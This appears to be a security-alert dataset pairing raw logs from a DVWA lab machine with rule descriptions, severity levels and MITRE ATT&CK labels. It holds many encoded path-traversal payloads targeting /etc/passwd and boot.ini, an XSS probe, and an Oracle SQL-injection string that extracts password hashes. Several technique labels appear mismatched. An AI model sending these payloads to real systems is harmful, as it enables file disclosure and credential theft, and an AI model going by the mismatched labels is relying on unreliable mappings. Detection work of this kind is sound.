Oct 18 23:43:26 sohaib-virtual-machine sudo: sohaib : TTY=pts/9 ; PWD=/home/sohaib ; USER=root ; COMMAND=/usr/bin/sh -c 'printf "command_start_%s" "uIHbP4hy"; timeout -s9 240s find \'/bin/\' \'/sbin/\' \'/usr/bin/\' \'/usr/sbin/\' \'/usr/local/\' \'/opt/\' \'/usr/lib\' -follow \\( ! \\( -fstype nfs -prune -o -fstype nfs4 -prune -o -fstype cifs -prune -o -fstype smbfs -prune -o -fstype afs -prune -o -fstype sysfs -prune -o -fstype proc -prune -o -fstype panfs -prune \\) -a \\( -path \'*/flask\' \\) \\) 2>/dev/null; RET=$?; echo; echo "$RET"; printf "command_done_%s" "UP6Y2VQc"'
Successful sudo to ROOT executed.
3
["T1548.003"]
["TA0004","TA0005"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:12 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%00%2e%c1%8s%2e%00%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/boot/grub/x86_64-efi/romfs.mod' modified Mode: scheduled Changed attributes: mtime,inode Old modification time was: '1696137074', now it is '1697479755' Old inode was: '1049403', now it is '1049124'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:29 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5C%2e%2e%uF025%5C%2e%2e%uF025etc%uF025issue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/tmp/go-build2724593589/b152/_pkg_.a' modified Mode: realtime Changed attributes: size,md5,sha1,sha256 Size changed from '48364' to '240876' Old md5sum was: 'c0428bed0d2d4eda698298c1718c333d' New md5sum is : '46ee4905cb326413eac30e3eb48af3b8' Old sha1sum was: 'da401ba2263469a519a3ec2f67bba573e518b570' New sha1sum is : '55c24afc0480a4f0e7a135a8eecd09fdf79fd944' Old sha256sum was: '416f9d55096820ff7fa8e6bc15d7da77bd07f43a541ec52a53fe1165c7721ffa' New sha256sum is : '5376964ba893ba21f3010888b2d75d57446cd250bad791fc81d95a1f69b94a0b'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:24:46 +0500] "GET /DVWA/login.php?password=..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini%00.htm HTTP/1.1" 200 1722 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:15 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%2f%2f&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:50 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2fetc%2fpasswd%00index%2ehtml&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:16 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%01%e0%80%af%2e%2e%01%e0%80%af%2e%2e%01%e0%80%af%2e%2e%01%e0%80%af%2e%2e%01%e0%80%af%2e%2e%01%e0%80%afetc%e0%80%afissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:21:35 +0500] "GET /DVWA/login.php?password=/%80../%80../%80../%80../%80../%80../%80../%80../%80../boot.ini&password= HTTP/1.1" 200 1722 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:56 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/audit/audit.log
type=SYSCALL msg=audit(1704468513.040:961): arch=c000003e syscall=59 success=yes exit=0 a0=7f24160ad010 a1=557b80b9d950 a2=7ffe99221d60 a3=0 items=2 ppid=1647 pid=1763 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="mysql" exe="/usr/bin/mariadb" subj=unconfined key="audit-wazuh-c"ARCH=x86_64 SYSCALL=execve AUID="unset" UID="root" GID="root" EUID="root" SUID="root" FSUID="root" EGID="root" SGID="root" FSGID="root" type=EXECVE msg=audit(1704468513.040:961): argc=8 a0="/usr/bin/mysql" a1="--defaults-file=/etc/mysql/debian.cnf" a2="--skip-column-names" a3="--silent" a4="--batch" a5="--force" a6="-e" a7=73656C65637420636F756E74282A2920696E746F2040646973636172642066726F6D20606D7973716C602E6068656C705F63617465676F727960 type=CWD msg=audit(1704468513.040:961): cwd="/" type=PATH msg=audit(1704468513.040:961): item=0 name="/usr/bin/mysql" inode=294255 dev=08:03 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root" type=PATH msg=audit(1704468513.040:961): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=264289 dev=08:03 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root" type=PROCTITLE msg=audit(1704468513.040:961): proctitle=2F7573722F62696E2F6D7973716C002D2D64656661756C74732D66696C653D2F6574632F6D7973716C2F64656269616E2E636E66002D2D736B69702D636F6C756D6E2D6E616D6573002D2D73696C656E74002D2D6261746368002D2D666F726365002D650073656C65637420636F756E74282A2920696E746F20406469736361
Discovery System Architecture via file Command
14
["T1083"]
["TA0007"]
/var/log/audit/audit.log
type=SYSCALL msg=audit(1704468461.932:612): arch=c000003e syscall=59 success=yes exit=0 a0=c00020f830 a1=c000234230 a2=c0002384d0 a3=8 items=2 ppid=910 pid=1390 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="apparmor_parser" exe="/snap/snapd/20290/usr/lib/snapd/apparmor_parser" subj=unconfined key="audit-wazuh-c"ARCH=x86_64 SYSCALL=execve AUID="unset" UID="root" GID="root" EUID="root" SUID="root" FSUID="root" EGID="root" SGID="root" FSGID="root" type=EXECVE msg=audit(1704468461.932:612): argc=8 a0="/snap/snapd/20290/usr/lib/snapd/apparmor_parser" a1="--config-file" a2="/snap/snapd/20290/usr/lib/snapd/apparmor/parser.conf" a3="--base" a4="/snap/snapd/20290/usr/lib/snapd/apparmor.d" a5="--policy-features" a6="/snap/snapd/20290/usr/lib/snapd/apparmor.d/abi/3.0" a7="--preprocess" type=CWD msg=audit(1704468461.932:612): cwd="/" type=PATH msg=audit(1704468461.932:612): item=0 name="/snap/snapd/20290/usr/lib/snapd/apparmor_parser" inode=291 dev=07:0e mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root" type=PATH msg=audit(1704468461.932:612): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=264289 dev=08:03 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root" type=PROCTITLE msg=audit(1704468461.932:612): proctitle=2F736E61702F736E6170642F32303239302F7573722F6C69622F736E6170642F61707061726D6F725F706172736572002D2D636F6E6669672D66696C65002F736E61702F736E6170642F32303239302F7573722F6C69622F736E6170642F61707061726D6F722F7061727365722E636F6E66002D2D62617365002F736E61702F
Discovery System Architecture via file Command
14
["T1083"]
["TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:59 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%2e%2e%5cboot%2eini%3bindex%2ehtml&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/tmp/cci1dv3Z.cdtor.c' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8boot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:08 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:29 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5C%2e%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:02 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:26:30 +0500] "GET /DVWA/login.php?password=login.php%00.jpg HTTP/1.1" 200 1722 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:07 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:30 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5C%2e%2e%f8%80%80%80%af%5C%2e%2e%f8%80%80%80%af%5C%2e%2e%f8%80%80%80%af%5C%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cissue%3bindex%2ehtm&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:11 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%00%2e%c0%9v%2e%00%2e%c0%9v%2e%00%2e%c0%9v%2e%00%2e%c0%9vetc%c0%9vissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:40 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2f%c1%1c%2e%2e%2e%2e%2f%c1%1c%2e%2e%2e%2e%2f%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e%c1%1c%2e%2e%2e%2f%2e%c1%1c%2e%2e%2e%2f%2e%c1%1c%2e%2e%2e%2f%2e%c1%1c%2e%2e%2e%2f%2e%c1%1cetc%c1%1cissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:40:49 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:09 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:36 +0500] "GET /index.php?blogpost=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Multiple web server 400 error codes from same source ip.
10
["T1595.002"]
["TA0043"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:09 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:04 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:34 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c1%af%2e%2e%c1%afetc%c1%afpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:39 +0500] "GET /scriptsswsrv.cgi?wg=<script>foo</script> HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Multiple XSS (Cross Site Scripting) attempts from same source ip.
10
["T1059"]
["TA0002"]
/var/log/auth.log
Oct 18 23:51:13 sohaib-virtual-machine sudo: sohaib : TTY=pts/4 ; PWD=/home/sohaib ; USER=root ; COMMAND=/usr/bin/sh -c 'printf "command_start_%s" "erY6eH3b"; unzip -q -c /usr/share/java/libintl-0.21.jar META-INF/MANIFEST.MF | grep -e Bundle-Name -e Log4jReleaseVersion -e Bundle-Version -e Implementation-Title -e Implementation-Version; printf "command_done_%s" "BfRvGxJx"'
Successful sudo to ROOT executed.
3
["T1548.003"]
["TA0004","TA0005"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:50 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:45:39 sohaib-virtual-machine sudo: sohaib : TTY=pts/3 ; PWD=/home/sohaib ; USER=root ; COMMAND=/usr/bin/sh -c 'printf "command_start_%s" "4Gg7PFTq"; locate ssh 2>&1; printf "command_done_%s" "c9P62zSW"'
Successful sudo to ROOT executed.
3
["T1548.003"]
["TA0004","TA0005"]
syscheck
File '/usr/bin/gtf' modified Mode: scheduled Changed attributes: inode,mtime,md5,sha1,sha256 Old modification time was: '1698078642', now it is '1702430913' Old inode was: '269879', now it is '270319' Old md5sum was: '54375e496c421cf8cde3f65190b59c92' New md5sum is : '433161b451cd8df7dda3ea9fe42441ac' Old sha1sum was: '6c15bf4ed96089fad8ed8f96ba091b15565a6553' New sha1sum is : '5c994ecb7bd616e183ecfdfde19d4bfef3dd2af9' Old sha256sum was: '76517cfd368083f16733a650d81ce3bd42f4ac86701e63f2457193f887a33a57' New sha256sum is : '23a828895b4fb1066ba88273fdc622e923249a552782d7bc4eb111f26104f591'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:40 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2f%c1%1c%2e%2e%2e%2e%2f%c1%1c%2e%2e%2e%2e%2f%c1%1c%2e%2e%2e%2e%2f%c1%1c%2e%2e%2e%2e%2f%c1%1cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:10 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%5c%5c%5c%2e%2e%5c%5c%5c%2e%2e%5c%5c%5c%2e%2e%5c%5c%5c%2e%2e%5c%5c%5c%2e%2e%5c%5c%5c%2e%2e%5c%5c%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:44 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2fetc%2fphp%2eini%00&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:48:13 sohaib-virtual-machine sudo: sohaib : TTY=pts/7 ; PWD=/home/sohaib ; USER=root ; COMMAND=/usr/bin/sh -c 'printf "command_start_%s" "eRnG5ckF"; ls -l /snap/core22/864/usr/share/doc/openssl; printf "command_done_%s" "5ibVAkpq"'
Successful sudo to ROOT executed.
3
["T1548.003"]
["TA0004","TA0005"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:01 +0500] "GET /cgi-bin/view_source?../../../../../../../../../etc/passwd HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:20 +0500] "GET /DVWA/vulnerabilities/xss_r/?name='%20AND%201%3dutl_inaddr%2eget_host_address((SELECT%20DISTINCT(PASSWORD)%20FROM%20(SELECT%20DISTINCT(PASSWORD),%20ROWNUM%20AS%20LIMIT%20FROM%20SYS%2eUSER$)%20WHERE%20LIMIT%3d8))%20AND%20'i'%3d'i&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple SQL injection attempts from same source ip.
10
["T1055"]
["TA0005","TA0004"]
/var/log/apache2/access.log
